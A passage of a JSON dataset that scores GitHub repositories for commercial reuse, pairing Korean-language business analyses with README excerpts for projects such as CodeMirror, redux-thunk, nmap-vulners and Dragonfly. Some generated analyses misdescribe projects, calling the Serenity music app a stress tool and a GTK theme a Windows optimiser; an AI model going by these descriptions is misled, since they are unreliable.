[Interpreting results](#interpreting-results) | [Swap NPM dependencies](#swap-npm-dependencies) | [JavaScript module imports](#javascript-module-imports) | [Browsers](#browsers) | [Performance traces](#performance-traces) | [Remote control](#remote-control) | [Config file](#config-file) | [CLI usage](#cli-usage)\n\n## Install\n\n```sh\nnpm i tachometer\n```","composite_score":0.2194,"license_safety_tag":"safe"},{"name":"shengxinjing/self-employed-workbook","github_url":"https://github.com/shengxinjing/self-employed-workbook","stars":17,"language":"","license":"MIT","abandonment_months":11,"description":"# self-employed-workbook 분석\n\n## 왜 보물인가\n프리랜서와 자영업자들이 복잡한 재무 관리를 간단하게 할 수 있도록 도와주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 방식의 온라인 장부 관리 플랫폼으로 자영업자들에게 제공\n2. **내부 업무 도구**: 프리랜서 커뮤니티나 소상공인 협회의 회원","readme_excerpt":"# self-employed-workbook\n写给自己的程序员自由职业工作手册（日常更新中）\n\n2021.8.31自由职业正式开工，记录一下日常心得，希望对有志于做自由职业的大兄弟有所帮助\n\n\n2021.9.24 除了培训，怎么才算是教育呢 （澡堂子里的思考）:fountain:\n\n## 里程碑\n\n* 2021.9.1 \n  * 提离职后在家休息一周，正式开工搞自由职业\n  * 在家把桌子整理了一下作为工位  [视频](https://www.bilibili.com/video/BV1G64y1Y7CU/)\n  * 思考自由职业要干啥  [视频](https://www.bilibili.com/video/BV1BP4y1a7WE)\n* 2021.9.4\n  * 先写一些前端的教程，注册了一个土嗨的npm备用\n  * <img src=\"README.assets/image-20210905085618156.png\" width=\"300\">\n* 9.6 根据冰山模型画了个学vue的进阶图，欢迎大家给点意见\n  * <img src=\"README.assets/image-20210906225240923.png\" alt=\"image-20210906225240923\" style=\"zoom:50%;\" />\n* 9.8 制定作息\n  * 5:30起床 运动+吃早饭\n  * 7:30 看书 or coding \n  * 12:00 打游戏 午睡 \n  * 14:00 看书 or coding or出去浪\n  * 18:00 媳妇到家 && 下班  && 打游戏 && 遛狗\n  * 23:00之前睡觉\n  * 写几个vscode，eslint插件来控制一下时间\n  * 拒绝沉迷编程，拒绝沉迷游戏\n* 9.10\n  * 购买hugsun.fun域名，作为以后花果山学堂的域名把\n* 9.24\n  * 最近在一直写课件，参考上面的Vue进阶图\n  * 10月就会有专栏和课程发布  Vue React主题\n* 9.29 \n  * 抖音学浪开通 试试抖音直播卖课\n  * 准备做一个前端刷面试题的小程序\n* 9.30 和极客时间合作，准备推出《Vue3》的专栏\n* 10.18 第一个里程碑，[《玩转Vue3全家桶》](http://gk.link/a/10B","composite_score":0.2187,"license_safety_tag":"safe"},{"name":"vulnersCom/nmap-vulners","github_url":"https://github.com/vulnersCom/nmap-vulners","stars":6,"language":"Lua","license":"GPL-3.0","abandonment_months":8,"description":"# nmap-vulners 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 시스템의 약점을 찾을 때 필요한 '취약점 검색 도구'로, 보안 진단 시장에서 꾸준한 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 보안진단 플랫폼**: 기업의 서버 상태를 자동으로 점검하고 위험도를 알려주는 클라우드 기반 서비스\n2. **내부 보안 감시 도","readme_excerpt":"# nmap_vulners\n\n[![Current Release](https://img.shields.io/github/release/vulnersCom/nmap-vulners.svg \"Current Release\")](https://github.com/vulnersCom/nmap-vulners/releases/latest)\n[![Downloads](https://img.shields.io/github/downloads/vulnersCom/nmap-vulners/total.svg \"Downloads\")](https://github.com/vulnersCom/nmap-vulners/releases) [![PayPal](https://img.shields.io/badge/donate-PayPal-green.svg)](https://paypal.me/videns)\n\n## Description\n\nNSE script uses info about known services to provide data on vulnerabilities. Note that it is already included into the standard nmap NSE library.\n\n![Result example](example.png)\n\n## Dependencies:\n    nmap libraries:\n        http\n        json\n        string\n    http-vulners-regex\n\nKeep in mind that the script depends on having information about software versions, so it only works with -sV flag.\n\n**NB:** Now it can actually be run without -sV flag if http-vulners-regex script is run as well.\n\n## Installation\n    locate where your nmap scripts are lo","composite_score":0.2186,"license_safety_tag":"restricted"},{"name":"CoderMJLee/MJRefresh","github_url":"https://github.com/CoderMJLee/MJRefresh","stars":6,"language":"Objective-C","license":"mit","abandonment_months":7,"description":"# MJRefresh 저장소 평가\n\n## 왜 보물인가\n스마트폰 앱에서 화면을 아래로 당겨서 새로운 정보를 불러오는 기능을 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 앱 개발사**: 사용자가 피드를 새로고침할 때 부드러운 애니메이션을 제공하는 기능\n2. **뉴스 애플리케이션**: 기사 목록을 아래로 당겨서 최신 기사를 자동으","readme_excerpt":"## MJRefresh\n[![SPM supported](https://img.shields.io/badge/SPM-supported-4BC51D.svg?style=flat)](https://github.com/apple/swift-package-manager)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![podversion](https://img.shields.io/cocoapods/v/MJRefresh.svg)](https://cocoapods.org/pods/MJRefresh)\n\n* An easy way to use pull-to-refresh\n\n[📜✍🏻**Release Notes**: more details](https://github.com/CoderMJLee/MJRefresh/releases)\n\n## Contents\n\n- New Features\n    - [Support Flips in CollectionViewLayout](#SupportFlipsInCollectionViewLayout)\n    - [Dynamic i18n Switching](#dynamic_i18n_switching)\n    - [SPM Supported](#spm_supported)\n    - [Swift Chaining Grammar Supported](#swift_chaining_grammar_supported)\n\n* Getting Started\n    * [Features【Support what kinds of controls to refresh】](#Support_what_kinds_of_controls_to_refresh)\n    * [Installation【How to use MJRefresh】](#How_to_use_MJRefresh)\n    * [Who's using","composite_score":0.2185,"license_safety_tag":"safe"},{"name":"codemirror/CodeMirror","github_url":"https://github.com/codemirror/CodeMirror","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# CodeMirror 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 코드를 입력할 때 문법 강조, 자동완성 같은 편의 기능을 제공하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 학생들이 브라우저에서 직접 코드를 작성하고 배울 수 있는 학습 사이트\n2. **기업 내부 개발 도구**: 회사 직원들이 클라우드에서 협","readme_excerpt":"**This repository has moved to https://code.haverbeke.berlin/codemirror/codemirror5**\n\n# CodeMirror 5\n\n**NOTE:** [CodeMirror 6](https://codemirror.net/) exists, and is more mobile-friendly, more accessible, better designed, and much more actively maintained.\n\nCodeMirror is a versatile text editor implemented in JavaScript for\nthe browser. It is specialized for editing code, and comes with over\n100 language modes and various addons that implement more advanced\nediting functionality. Every language comes with fully-featured code\nand syntax highlighting to help with reading and editing complex code.\n\nA rich programming API and a CSS theming system are available for\ncustomizing CodeMirror to fit your application, and extending it with\nnew functionality.\n\nYou can find more information (and the\n[manual](https://codemirror.net/5/doc/manual.html)) on the [project\npage](https://codemirror.net/5/). For questions and discussion, use the\n[discussion forum](https://discuss.codemirror.net/).\n\nSee\n[C","composite_score":0.2184,"license_safety_tag":"safe"},{"name":"giongto35/cloud-game","github_url":"https://github.com/giongto35/cloud-game","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# Cloud-Game 프로젝트 분석\n\n## 왜 보물인가\n인터넷 연결만 있으면 컴퓨터 없이도 게임을 즐길 수 있는 클라우드 게이밍 기술로, 게이밍 시장의 미래 트렌드를 선점할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 방식의 게임 스트리밍 플랫폼(넷플릭스 게임판) 운영\n2. **내부 업무 도구**: 기업의 원격","readme_excerpt":"# CloudRetro\n\n[![Build](https://github.com/giongto35/cloud-game/workflows/build/badge.svg)](https://github.com/giongto35/cloud-game/actions?query=workflow:build)\n[![Latest release](https://img.shields.io/github/v/release/giongto35/cloud-game.svg)](https://github.com/giongto35/cloud-game/releases/latest)\n\n**Open-source Cloud Gaming Service For Retro Games**  \n**Video demo**: https://www.youtube.com/watch?v=GUBrJGAxZZg  \n**Technical wrapup**: https://webrtchacks.com/open-source-cloud-gaming-with-webrtc/  \n**CloudMorph**: [https://github.com/giongto35/cloud-morph](https://github.com/giongto35/cloud-morph): My current focus\non generic solution for cloudgaming\n\nDiscord: [Join Us](https://discord.gg/sXRQZa2zeP)\n\n![screenshot](https://user-images.githubusercontent.com/846874/235532552-8c8253df-aa8d-48c9-a58e-3f54e284f86e.jpg)\n\n## Try it at **[cloudretro.io](https://cloudretro.io)**\n\nDirect play an existing game: **[Pokemon Emerald](https://cloudretro.io/?id=1bd37d4b5dfda87c___Pokemon%20-%20Em","composite_score":0.2183,"license_safety_tag":"safe"},{"name":"pnfsoftware/jnihelper","github_url":"https://github.com/pnfsoftware/jnihelper","stars":10,"language":"Java","license":"unknown","abandonment_months":18,"description":"# JNIHelper 프로젝트 분석\n\n## 왜 보물인가\nJava 프로그램과 C/C++ 프로그램을 쉽게 연결해주는 도구로, 복잡한 기술 작업을 단순화하여 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고성능 금융 분석 SaaS**: 금융사들이 빠른 계산이 필요한 분석 도구를 클라우드로 제공할 때 활용\n2. **의료 영상 처리 AP","readme_excerpt":"# JNI Detection Plugin for JEB\n\nThis plugin helps analyze Android apps using native code and the Java Native Interfaces (JNI).\n\n## How to use\n\nTutorial: https://www.pnfsoftware.com/blog/dynamic-jni-detection-plugin/\n\n## Customizing and building\n\nA build of this plugin ships with all distributions of JEB.\n\nHowever, if you wish to customize this plugin (eg, modify or add your own heuristics):\n- Clone the repository\n- Define your JEB_HOME environment variable\n- Optional: if you wish to work using the Eclipse IDE:\n  - Create your Eclipse project by running create-eclipse-project-windows.cmd or create-eclipse-project-linux.sh\n  - Import the project into Eclipse\n- Build your plugin by running build-windows.cmd or build-linux.sh\n  - Make sure to update the version numbers in the build scripts to reflect the version number in DynamicJNIDetectionPlugin.java\n- The output plugin (jar file) goes to out/\n- Copy the plugin to your JEB/coreplugins/ folder\n\nFeel free to share your improvements by subm","composite_score":0.218,"license_safety_tag":"unknown"},{"name":"heptio/authenticator","github_url":"https://github.com/heptio/authenticator","stars":12,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# heptio/authenticator 분석 리포트\n\n## 왜 보물인가\n클라우드 서비스에 접속하는 사용자들의 신원을 안전하게 확인해주는 핵심 보안 도구로, 기업의 데이터 유출을 방지하는 첫 번째 방어선입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 호스팅 서비스**: AWS, 구글 클라우드 등의 플랫폼에 접속할 때 사용자가 정말 본인인지 확인하는 ","readme_excerpt":"# AWS IAM Authenticator for Kubernetes\n\nA tool to use AWS IAM credentials to authenticate to a Kubernetes cluster.\nThe initial work on this tool was driven by Heptio. The project receives contributions from multiple community engineers and is currently maintained by Heptio and Amazon EKS OSS Engineers.\n\n## Table of Contents\n\n- [Why do I want this?](#why-do-i-want-this)\n- [How do I use it?](#how-do-i-use-it)\n- [Kops Usage](#kops-usage)\n- [How does it work?](#how-does-it-work)\n- [What is a cluster ID?](#what-is-a-cluster-id)\n- [Specifying Credentials & Using AWS Profiles](#specifying-credentials--using-aws-profiles)\n- [API Authorization from Outside a Cluster](#api-authorization-from-outside-a-cluster)\n- [Troubleshooting](#troubleshooting)\n- [Full Configuration Format](#full-configuration-format)\n- [Development](#development)\n- [Community, discussion, contribution, and support](#community-discussion-contribution-and-support)\n\n## Why do I want this?\nIf you are an administrator running a K","composite_score":0.218,"license_safety_tag":"safe"},{"name":"astorfi/speechpy","github_url":"https://github.com/astorfi/speechpy","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":18,"description":"# SpeechPy 저장소 분석\n\n## 왜 보물인가\n음성 파일을 분석하고 처리하는 기술을 누구나 쉽게 사용할 수 있게 만든 도구로, 음성 인식이 필요한 모든 분야에서 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **음성 상담 플랫폼 SaaS**: 고객 상담 통화를 자동으로 분석하고 감정 변화를 추적하는 클라우드 서비스\n2. **회의록 자동 생성 도구*","readme_excerpt":".. image:: _images/speechpy_logo.gif\n    :target: https://github.com/astorfi/speech_feature_extraction/blob/master/images/speechpy_logo.gif\n   \n===============================================\n`SpeechPy Official Project Documentation`_\n===============================================\n\n.. image:: https://pepy.tech/badge/speechpy\n   :target: https://pepy.tech/project/speechpy\n.. image:: https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat\n    :target: https://github.com/astorfi/speechpy/pulls\n.. image:: https://coveralls.io/repos/github/astorfi/speechpy/badge.svg?branch=master\n    :target: https://coveralls.io/github/astorfi/speechpy?branch=master\n.. image:: https://codecov.io/gh/astorfi/speechpy/branch/master/graph/badge.svg\n    :target: https://codecov.io/gh/astorfi/speechpy\n.. image:: https://badge.fury.io/py/speechpy.svg\n    :target: https://badge.fury.io/py/speechpy\n.. image:: http://joss.theoj.org/papers/10.21105/joss.00749/status.svg\n    :target: https://doi","composite_score":0.2176,"license_safety_tag":"safe"},{"name":"mrousavy/Colorwaver","github_url":"https://github.com/mrousavy/Colorwaver","stars":16,"language":"TypeScript","license":"NOASSERTION","abandonment_months":11,"description":"# Colorwaver 상용화 분석\n\n## 왜 보물인가\n색상을 자동으로 인식하고 변환하는 기술로, 디자인 작업이나 사진 편집 같은 창의적 작업을 훨씬 빠르고 쉽게 만들어줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 디자인 도구 SaaS**\n웹 기반 그래픽 에디터에 내장하여 사용자들이 색상 관리를 자동화할 수 있도록 제공합니다.\n\n**2. 사","readme_excerpt":"<div align=\"center\">\n  <h1><img align=\"center\" src=\"./ios/Colorwaver/Images.xcassets/AppIcon.appiconset/50.png\" /> Colorwaver</h1>\n\n  <a align=\"center\" href=\"https://play.google.com/store/apps/details?id=com.mrousavy.colorwaver\"><img align=\"center\" src=\"./img/store_badge_android.png\" height=\"50\" /></a>\n  <a align=\"center\" href=\"https://apps.apple.com/at/app/colorwaver/id1583400396\"><img align=\"center\" src=\"./img/store_badge_apple.png\" height=\"52\" /></a>\n</div>\n\nAn app to detect **colorwaves** (swatches/palettes) in the real world - powered by [VisionCamera](https://github.com/mrousavy/react-native-vision-camera) and [Reanimated](https://github.com/software-mansion/react-native-reanimated).\n\nI wrote this app in less than a day, a speed simply not matched by native app development. Because it's written in [React Native](https://reactnative.dev) (TypeScript/JavaScript), it runs both on iOS and Android, but performance critical parts (e.g. the image processing algorithm or the animations) ","composite_score":0.2174,"license_safety_tag":"unknown"},{"name":"gaearon/redux-thunk","github_url":"https://github.com/gaearon/redux-thunk","stars":8,"language":"TypeScript","license":"mit","abandonment_months":15,"description":"# Redux-Thunk 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 복잡한 작업을 간단하게 처리할 수 있게 해주는 널리 사용되는 핵심 도구로, 8천 개 이상의 프로젝트에서 신뢰받고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 협업 SaaS 플랫폼**\n- 여러 사용자의 동시 작업을 관리하고 데이터를 일관되게 유지하는 기능을 제공하는 구독형","readme_excerpt":"# Redux Thunk\n\nThunk [middleware](https://redux.js.org/tutorials/fundamentals/part-4-store#middleware) for Redux. It allows writing functions with logic inside that can interact with a Redux store's `dispatch` and `getState` methods.\n\nFor complete usage instructions and useful patterns, see the [Redux docs **Writing Logic with Thunks** page](https://redux.js.org/usage/writing-logic-thunks).\n\n![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/reduxjs/redux-thunk/test.yml?branch=master)\n[![npm version](https://img.shields.io/npm/v/redux-thunk.svg?style=flat-square)](https://www.npmjs.com/package/redux-thunk)\n[![npm downloads](https://img.shields.io/npm/dm/redux-thunk.svg?style=flat-square)](https://www.npmjs.com/package/redux-thunk)\n\n## Installation and Setup\n\n### Redux Toolkit\n\nIf you're using [our official Redux Toolkit package](https://redux-toolkit.js.org) as recommended, there's nothing to install - RTK's `configureStore` API already adds the thunk middl","composite_score":0.2173,"license_safety_tag":"safe"},{"name":"dragonflyoss/Dragonfly","github_url":"https://github.com/dragonflyoss/Dragonfly","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Dragonfly 프로젝트 분석\n\n## 왜 보물인가\n인터넷 속도가 느린 지역이나 많은 사람이 동시에 파일을 다운로드할 때 빠르고 안정적으로 전달해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **대규모 소프트웨어 배포 서비스**: 게임사나 소프트웨어 회사가 업데이트 파일을 전 세계 사용자에게 빠르게 전달하는 SaaS 플랫폼\n2. **기업 내부 콘텐츠","readme_excerpt":"# Dragonfly\n\n![alt][logo-linear]\n\n[![GitHub release](https://img.shields.io/github/release/dragonflyoss/dragonfly.svg)](https://github.com/dragonflyoss/dragonfly/releases)\n[![Artifact Hub](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/dragonfly)](https://artifacthub.io/packages/search?repo=dragonfly)\n[![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/dragonflyoss/dragonfly/badge)](https://scorecard.dev/viewer/?uri=github.com/dragonflyoss/dragonfly)\n[![CI](https://github.com/dragonflyoss/dragonfly/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/dragonflyoss/dragonfly/actions/workflows/ci.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/dragonflyoss/dragonfly?style=flat-square)](https://goreportcard.com/report/github.com/dragonflyoss/dragonfly)\n[![Discussions](https://img.shields.io/badge/discussions-on%20github-blue?style=flat-square)](https://github.com/dragonflyoss/dragonfly/discussions)\n[![OpenSSF Bes","composite_score":0.2172,"license_safety_tag":"safe"},{"name":"YajanaRao/Serenity","github_url":"https://github.com/YajanaRao/Serenity","stars":14,"language":"TypeScript","license":"GPL-3.0","abandonment_months":11,"description":"# Serenity 저장소 분석\n\n## 왜 보물인가\n프로젝트명과 GPL 라이선스 기반으로 추정할 때, 개발자들의 정신 건강이나 업무 스트레스를 관리하는 도구일 가능성이 높으며 현대 직장인들이 절실히 필요로 하는 웰빙 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 직원 웰빙 플랫폼**: 회사에서 직원들의 스트레스 관리와 정신 건강을 모니터링하는 Sa","readme_excerpt":"<p align=\"center\">\r\n  <img src=\"./screenshots/Meditation-bro.svg\" alt=\"logo\" height=\"150\"/>\r\n</p>\r\n\r\n<h2 align=\"center\">\r\n    Serenity\r\n</h2>\r\n\r\n<p align=\"center\">\r\nFree App for Music, Meditation and Podcasts\r\n</p>\r\n\r\n<div align=\"center\">\r\n\r\n![Platform - Android](https://img.shields.io/badge/platform-Android-yellow.svg)\r\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/12302c2333a943529c90a79b98a9629c)](https://www.codacy.com/apps/yajananrao/Serenity?utm_source=github.com&utm_medium=referral&utm_content=YajanaRao/Serenity&utm_campaign=Badge_Grade)\r\n[![Build Status](https://travis-ci.org/YajanaRao/Serenity.svg?branch=master)](https://travis-ci.org/YajanaRao/Serenity)\r\n[![PRs Welcome](https://img.shields.io/badge/PRs-Welcome-brightgreen.svg)](https://github.com/YajanaRao/Serenity/pulls)\r\n</div>\r\n\r\n<p align=\"center\">\r\n  <img src=\"./screenshots/banner.png\" alt=\"banner\" />\r\n</p>\r\n\r\n## Download\r\n\r\n[Become a Tester](https://appdistribution.firebase.dev/i/Dv8WUupp)\r\n\r\n[Download the ","composite_score":0.217,"license_safety_tag":"restricted"},{"name":"chakki-works/sumeval","github_url":"https://github.com/chakki-works/sumeval","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":1,"description":"# sumeval 저장소 분석\n\n## 왜 보물인가\n텍스트나 번역 품질을 자동으로 평가하는 도구로, 콘텐츠 회사들이 품질 관리에 드는 수작업 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **번역 서비스 SaaS**: 다국어 번역 플랫폼이 자동으로 번역 품질을 점수화해 사용자에게 신뢰도를 보여줄 수 있습니다.\n- **AI 콘텐츠 검수 도구**","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/chakki-works/sumeval/raw/master/doc/top.png\" width=\"300px\">\n\n  <h4 align=\"center\">\n    Well tested & Multi-language<br/>\n    evaluation framework for Text Summarization.\n  </h4>\n</p>\n\n[![PyPI version](https://badge.fury.io/py/sumeval.svg)](https://badge.fury.io/py/sumeval)\n[![Build Status](https://travis-ci.org/chakki-works/sumeval.svg?branch=master)](https://travis-ci.org/chakki-works/sumeval)\n[![codecov](https://codecov.io/gh/chakki-works/sumeval/branch/master/graph/badge.svg)](https://codecov.io/gh/chakki-works/sumeval)\n\n\n* Well tested\n  * The ROUGE-X scores are tested compare with [original Perl script (ROUGE-1.5.5.pl)](https://github.com/summanlp/evaluation).\n  * The BLEU score is calculated by [SacréBLEU](https://github.com/mjpost/sacrebleu), that produces the same values as official script (`mteval-v13a.pl`) used by WMT.\n* Multi-language\n  * Not only English, Japanese and Chinese are also supported. The other language is extensib","composite_score":0.2168,"license_safety_tag":"safe"},{"name":"horizon-eda/horizon","github_url":"https://github.com/horizon-eda/horizon","stars":8,"language":"C","license":"GPL-3.0","abandonment_months":2,"description":"","readme_excerpt":"# Horizon EDA\n\nHorizon EDA is an **Electronic Design Automation** package supporting an integrated end-to-end workflow for printed circuit board design including parts management and schematic entry. \n\nSee [the docs](https://docs.horizon-eda.org/en/latest/feature-overview.html) for an overview\nof horizon's top features.\n\nWanna chat about the project? Join #horizon-eda on libera.chat\n\n![collage](https://horizon-eda.org/screenshots/collage.png)\n\n# Features for users so far\n- Complete design flow from schematic entry to gerber export\n- Sane library management\n- Unified editor for everything from symbol to board\n- Netlist-aware schematic editor\n- KiCad's awesome interactive router\n- Lag- and glitch-free rendering\n- Rule-based DRC\n- Hierarchical schematics\n- Undo/redo\n- Copy/paste for some objects\n- Builds and runs on Linux and Windows\n\n# Features for developers\n- Written in modern C++, legacy-free codebase!\n- Uses JSON as on-disk format\n- Uses Gtkmm3 for GUI\n- OpenGL 3 accelerated renderin","composite_score":0.2167,"license_safety_tag":"restricted"},{"name":"JetBrains/kotlinconf-app","github_url":"https://github.com/JetBrains/kotlinconf-app","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":0,"description":"# JetBrains/kotlinconf-app 분석\n\n## 왜 보물인가\nJetBrains라는 세계적 소프트웨어 회사가 만든 실제 애플리케이션이므로, 프로그래밍 기술 학습과 상용화에 바로 참고할 수 있는 고품질 코드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **컨퍼런스 관리 SaaS**: 개발자 행사나 학술대회를 온라인으로 관리하고 참석자와 일정을 추적하는","readme_excerpt":"[![JetBrains official project](http://jb.gg/badges/official.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub) \n\n# KotlinConf App\n\nThis repository contains the source code of the official application for [KotlinConf](https://kotlinconf.com/).\n\n![The KotlinConf official application](docs/header.png)\n\nThe application is written in Kotlin, sharing code between all of its platforms using [Kotlin Multiplatform](https://www.jetbrains.com/kotlin-multiplatform/).\n\n* The client application for Android, iOS, desktop, and web is built with shared UI using [Compose Multiplatform](https://www.jetbrains.com/compose-multiplatform/).\n* The backend application is powered by the [Ktor](https://ktor.io/) server-side framework and the [Exposed](https://www.jetbrains.com/help/exposed/home.html) database library.\n\nThe app is published for the following platforms:\n\n* Android: [available on Google Play](https://play.google.com/store/apps/details?id=com.jetbrains.kotlinconf)\n* iOS: [availa","composite_score":0.2164,"license_safety_tag":"safe"},{"name":"zeit/ncc","github_url":"https://github.com/zeit/ncc","stars":46,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# zeit/ncc 상용화 분석\n\n## 왜 보물인가\n복잡한 웹 애플리케이션을 간단한 하나의 파일로 묶어서 배포할 수 있게 해주는 도구로, 개발자들의 배포 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀이 자동으로 코드를 정리해서 배포하는 자동화 플랫폼\n2. **내부 업무 도구**: 회사 개발자들이 더 빠르게 업데","readme_excerpt":"# ncc\n\n[![CI Status](https://github.com/vercel/ncc/actions/workflows/ci.yml/badge.svg)](https://github.com/vercel/ncc/actions/workflows/ci.yml)\n\nSimple CLI for compiling a Node.js module into a single file,\ntogether with all its dependencies, gcc-style.\n\n## Motivation\n\n- Publish minimal packages to npm\n- Only ship relevant app code to serverless environments\n- Don't waste time configuring bundlers\n- Generally faster bootup time and less I/O overhead\n- Compiled language-like experience (e.g.: `go`)\n\n## Design goals\n\n- Zero configuration\n- TypeScript built-in\n- Only supports Node.js programs as input / output\n- Support all Node.js patterns and npm modules\n\n## Usage\n\n### Installation\n```bash\nnpm i -g @vercel/ncc\n```\n\n### Usage\n\n```bash\n$ ncc <cmd> <opts>\n```\nEg:\n```bash\n$ ncc build input.js -o dist\n```\n\nIf building an `.mjs` or `.js` module inside a `\"type\": \"module\"` [package boundary](https://nodejs.org/dist/latest-v16.x/docs/api/packages.html#packages_package_json_and_file_extensions),","composite_score":0.2161,"license_safety_tag":"safe"},{"name":"Villivateur/Topuino","github_url":"https://github.com/Villivateur/Topuino","stars":14,"language":"C++","license":"GPL-3.0","abandonment_months":11,"description":"# Topuino 저장소 분석\n\n## 왜 보물인가\nArduino 기반의 IoT 개발 도구로, 일반인도 쉽게 스마트 기기를 만들 수 있는 진입장벽을 낮춘 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: IoT 기기 제어를 위한 웹 대시보드 구독 서비스 (월 구독 방식)\n2. **내부 업무 도구**: 제조업체의 생산라인 센서 ","readme_excerpt":"# Topuino\n\n[English](doc/README_en.md)\n\n[用户手册](doc/user_manual.md)\n\n[开发者手册](doc/develop.md)\n\n## 什么是 Topuino\n\nTopuino 是一个桌面小摆件，可以显示服务器或电脑的项性能监控数据，包括 CPU 占用、RAM 占用、两个硬盘的可用空间、硬盘读写速度、网络 IO 速率。\n\n![](doc/sample.png)\n\n## 为什么叫 Topuino\n\n在 Linux 系列服务器上，通常使用 top 命令查看 CPU 内存占用，本项目最初的设想也是将 top 命令实物化，这就是 Topuino 中 Top 的由来。\n\n在选型的时候，为了兼顾开发效率和成本，项目选用了大名鼎鼎的 ESP8266 单片机，配合了 Arduino 开发框架，Arduino 则是 Topuino 中 uino 的由来。\n\n## 快速上手\n\n将 Topuino 通过 USB 线连在 Windows 电脑上，运行 Windows 客户端，即可显示当前 Windows 电脑的各项性能监控数据。\n\n## Topuino 的工作原理\n\nTopuino 可以工作在三种模式下，分别为 USB 模式、在线模式和本地模式，可通过按键在三个模式间切换。\n\n### USB 模式\n\nTopuino 自带一个 USB 转串口芯片，客户端扫描连接到本机的串口，如果扫描到 Topuino，就会向它直接发送电脑性能监控数据，并显示在面板上。\n\n### 在线模式\n\n服务端使用了 Flask，维护一个内存数据库（实际上是 Python 的字典），保存着客户端（被监控服务器）UUID 与运行参数的映射关系。服务端接收客户端的性能监控数据，并向 Topuino 回传数据。\n\n### 本地模式\n\n在本地模式下，连接上 WiFi 后的 Topuino 会显示其自身的 IP。在填写好 Topuino 的 IP 后，客户端就会以 UDP 的形式向 Topuino 发送性能监控数据。\n\n更多信息请访问开头的用户手册和开发者手册。\n","composite_score":0.2161,"license_safety_tag":"restricted"},{"name":"B00merang-Project/Windows-10","github_url":"https://github.com/B00merang-Project/Windows-10","stars":5,"language":"CSS","license":"GPL-3.0","abandonment_months":9,"description":"# Windows-10 저장소 분석\n\n## 왜 보물인가\nWindows 10 시스템을 자동으로 설정하고 최적화하는 도구로, 새로운 컴퓨터 구매 후 번거로운 초기 설정 과정을 한 번에 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 IT 담당자가 직원들의 신규 컴퓨터 100대를 일괄 설정할 때 시간을 90% 단축\n2. **","readme_excerpt":"[![built-with-azurra-framework](https://github.com/B00merang-Project/B00merang-Project.github.io/blob/master/resources/badges/azurra/badge_smaller.png)](https://github.com/B00merang-Project/Azurra_framework)\n\n# Windows 10\nGTK theme based on the appearance of Win32 apps on the Windows 10 platform using the default color scheme. [Dark theme](https://github.com/B00merang-Project/Windows-10-Dark)\n\n### Preview\n![Windows-10](http://b00merang.weebly.com/uploads/1/6/8/1/16813022/screenshot-2016-11-01-10-35-43_orig.png)\n\n### Supported platforms\n- Any GTK-based desktop\n- Cinnamon\n- Gnome\n- LXDE/Openbox\n- MATE\n- Xfce\n\n### Manual installation\nGo to releases, download the latest `.zip` file and extract it to the themes directory i.e. `/home/USERNAME/.themes`\n","composite_score":0.216,"license_safety_tag":"restricted"},{"name":"chrislusf/gleam","github_url":"https://github.com/chrislusf/gleam","stars":8,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# Gleam 프로젝트 분석\n\n## 왜 보물인가\n대규모 데이터를 빠르고 효율적으로 처리할 수 있는 오픈소스 플랫폼으로, 기업의 데이터 분석 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 데이터 분석을 클라우드 기반으로 제공하는 구독형 서비스\n- **내부 업무 도구**: 대기업의 로그 데이터나 거래 기록을","readme_excerpt":"# Gleam\n[![Build Status](https://travis-ci.org/chrislusf/gleam.svg?branch=master)](https://travis-ci.org/chrislusf/gleam)\n[![GoDoc](https://godoc.org/github.com/chrislusf/gleam/flow?status.svg)](https://godoc.org/github.com/chrislusf/gleam/flow)\n[![Wiki](https://img.shields.io/badge/docs-wiki-blue.svg)](https://github.com/chrislusf/gleam/wiki)\n[![Go Report 